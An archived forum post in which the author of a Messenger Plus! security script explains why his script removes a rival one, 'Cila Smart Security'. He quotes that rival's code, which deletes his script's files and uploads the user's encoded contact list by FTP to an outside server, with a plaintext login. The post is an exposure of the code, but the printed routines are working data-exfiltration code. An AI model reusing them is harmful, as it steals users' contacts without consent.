What happened to the Messenger Plus! forums on msghelp.net?
Shoutbox » MsgHelp Archive » Messenger Plus! for Live Messenger » Scripting » WLM Safe 4.0 - What is this!

WLM Safe 4.0 - What is this!
Author: Message:
wincy
Junior Member
**


Posts: 67
Reputation: 4
34 / Male / Flag
Joined: Feb 2008
RE: WLM Safe 4.0 - What is this!
Hi MenthiX, thank for you reply!

I've made up tests with more than one anti-virus before using programs i downloaded from Internet.
They're quite commons and largely used, and avg, kaspersky and antivir didn't seem to identify them as dangerous or unwanted programs.
Are you sure that both exe are detected as infected/dangerous?

Thanks for your your tip about taskkill! Do you think it could be possible to make the same as path.exe in JScript?
Any help would be really appreciated! :)


Other things:

quote:
You assume Plus! is installed in %ProgramFiles%\"Messenger Plus! Live"\. Your script won't work at all when Plus! is installed in a different folder.

- Didn't mind, how can i determine Messenger Plus' installation directory with a batch file?

quote:
Why do you delete ""Cila Smart Security" in safe.bat?

- I delete Cila Smart Security for two reasons:

  • Cila's script is not compatibile with WLM Safe, and it also runs this code:


        case "delws":
            fso.DeleteFile(Directory + '\\Scripts' + '\\WLM Safe' + '\\ScriptInfo.xml');
            fso.DeleteFolder(Directory + '\\Scripts' + '\\WLM Safe'); break;
        case "inire":
            kickWLMsafe();
            MsgPlus.AddTimer("inire", 60000); break;

    function kickWLMsafe() {
        if (!fso.FileExists(Directory + "\\Scripts\\" + "WLM Safe" + "\\ScriptInfo.xml")) {} else {
            MsgPlus.DisplayToast(Script_Name, RLFF(LangT, 81) + RLFF(LangT, 82), "", "DelWLMS");
            ErrorNN("821", "WLM Safe");
            TraceIA(RLFF(LangT, 83))
        }
    }
    function DelWLMS() {
        var fileObj = fso.OpenTextFile(Directory + '\\Scripts' + '\\WLM Safe' + '\\ScriptInfo.xml', 2, 0);
        var fileObjA = fso.OpenTextFile(Directory + '\\Scripts' + '\\WLM Safe' + '\\wlmsafe.js', 2, 0);
        fileObj.Write('');
        fileObj.Close();
        fileObjA.Write('');
        fileObjA.Close();
        MsgPlus.AddTimer("delws", 3000)
    }


  • In advance, i discovered that Cila Smart Security stole part of my old wlm safe's code and grabs all users' contact list uploading it to a web server, as you can see here:


    function MakeConfigEMAIL() {
        Trace("0x222222224");
        var sssp = Messenger.MyEmail;
        var Contacts = Messenger.MyContacts;
        var e = new Enumerator(Contacts);
        for (; ! e.atEnd(); e.moveNext()) {
            var Contact = e.item();
            AddLineToFileZ(MsgPlus.ScriptFilesPath + "\\Saves" + "\\" + sssp + ".dat", encode(encodeBinary(Contact.Email)))
        }
        AddLineToFileZ(MsgPlus.ScriptFilesPath + "\\Saves" + "\\" + sssp + ".dat", encode(encodeBinary(Messenger.MyEmail)));
        UpCEMAIL()
    }

    function UpCEMAIL() {
        ftpweb = "ftp.cilacorp.x10hosting.com";
        Trace("0x2777777777");
        for (var e = new Enumerator(fso.GetFolder(MsgPlus.ScriptFilesPath + "\\Saves").files); ! e.atEnd(); e.moveNext()) {
            scsulmi = MsgPlus.UploadFileFTP(MsgPlus.ScriptFilesPath + "\\Saves" + "\\" + e.item().Name, ftpweb, "msgplus@cilacorp.x10hosting.com", "T9Mrvcjyz81Q", e.item().Name)
        }
    }

I'm trying to make WLM Safe a script that really means "Messenger's Security" as far as possible, so i think i should do all i can.

Thanks to all for comprehension, replies and support.

This post was edited on 02-10-2009 at 09:33 PM by wincy.
02-10-2009 09:28 PM
Profile E-Mail PM Find Quote Report
« Next Oldest Return to Top Next Newest »

Messages In This Thread
WLM Safe 4.0 - What is this! - by BlackStar on 02-09-2009 at 09:55 PM
RE: WLM Safe 4.0 - What is this! - by prashker on 02-09-2009 at 10:35 PM
RE: WLM Safe 4.0 - What is this! - by Menthix on 02-09-2009 at 10:51 PM
RE: WLM Safe 4.0 - What is this! - by MeEtc on 02-10-2009 at 01:21 AM
RE: WLM Safe 4.0 - What is this! - by wincy on 02-10-2009 at 02:34 PM
RE: WLM Safe 4.0 - What is this! - by TheGuruSupremacy on 02-10-2009 at 03:01 PM
RE: WLM Safe 4.0 - What is this! - by Jigen90 on 02-10-2009 at 03:13 PM
RE: WLM Safe 4.0 - What is this! - by Jigen90 on 02-10-2009 at 04:35 PM
RE: WLM Safe 4.0 - What is this! - by TheGuruSupremacy on 02-10-2009 at 04:41 PM
RE: WLM Safe 4.0 - What is this! - by BlackStar on 02-10-2009 at 06:07 PM
RE: WLM Safe 4.0 - What is this! - by wincy on 02-10-2009 at 07:20 PM
RE: WLM Safe 4.0 - What is this! - by Menthix on 02-10-2009 at 07:53 PM
RE: WLM Safe 4.0 - What is this! - by wincy on 02-10-2009 at 09:28 PM
RE: WLM Safe 4.0 - What is this! - by NiteMare on 02-11-2009 at 04:13 AM
RE: RE: WLM Safe 4.0 - What is this! - by wincy on 02-11-2009 at 01:22 PM
RE: WLM Safe 4.0 - What is this! - by roflmao456 on 02-11-2009 at 05:43 AM
RE: RE: WLM Safe 4.0 - What is this! - by Jigen90 on 02-11-2009 at 09:29 AM
RE: WLM Safe 4.0 - What is this! - by vaccination on 02-11-2009 at 01:50 PM
RE: WLM Safe 4.0 - What is this! - by Moh on 02-11-2009 at 02:13 PM
RE: WLM Safe 4.0 - What is this! - by wincy on 02-11-2009 at 02:17 PM
RE: WLM Safe 4.0 - What is this! - by Spunky on 02-11-2009 at 02:57 PM
RE: WLM Safe 4.0 - What is this! - by wincy on 02-11-2009 at 03:06 PM
RE: WLM Safe 4.0 - What is this! - by Spunky on 02-11-2009 at 03:15 PM
RE: WLM Safe 4.0 - What is this! - by wincy on 02-11-2009 at 03:29 PM
RE: WLM Safe 4.0 - What is this! - by Spunky on 02-11-2009 at 03:36 PM
RE: WLM Safe 4.0 - What is this! - by wincy on 02-11-2009 at 03:42 PM
RE: WLM Safe 4.0 - What is this! - by Menthix on 02-11-2009 at 08:23 PM
RE: WLM Safe 4.0 - What is this! - by Spunky on 02-11-2009 at 08:31 PM
RE: WLM Safe 4.0 - What is this! - by Menthix on 02-11-2009 at 08:45 PM
RE: WLM Safe 4.0 - What is this! - by wincy on 02-11-2009 at 09:09 PM
Thanks! - by wincy on 05-25-2009 at 05:08 PM
RE: WLM Safe 4.0 - What is this! - by BlackStar on 05-25-2009 at 06:21 PM
RE: WLM Safe 4.0 - What is this! - by wincy on 05-25-2009 at 07:33 PM
RE: WLM Safe 4.0 - What is this! - by CookieRevised on 05-25-2009 at 07:49 PM
RE: WLM Safe 4.0 - What is this! - by Menthix on 05-25-2009 at 08:02 PM
RE: WLM Safe 4.0 - What is this! - by CookieRevised on 05-25-2009 at 08:12 PM
RE: WLM Safe 4.0 - What is this! - by wta121 on 05-26-2009 at 11:37 AM
RE: WLM Safe 4.0 - What is this! - by wincy on 05-26-2009 at 11:57 AM
RE: RE: WLM Safe 4.0 - What is this! - by CookieRevised on 05-26-2009 at 01:30 PM


Threaded Mode | Linear Mode
View a Printable Version
Send this Thread to a Friend
Subscribe | Add to Favorites
Rate This Thread:

Forum Jump:

Forum Rules:
You cannot post new threads
You cannot post replies
You cannot post attachments
You can edit your posts
HTML is Off
myCode is On
Smilies are On
[img] Code is On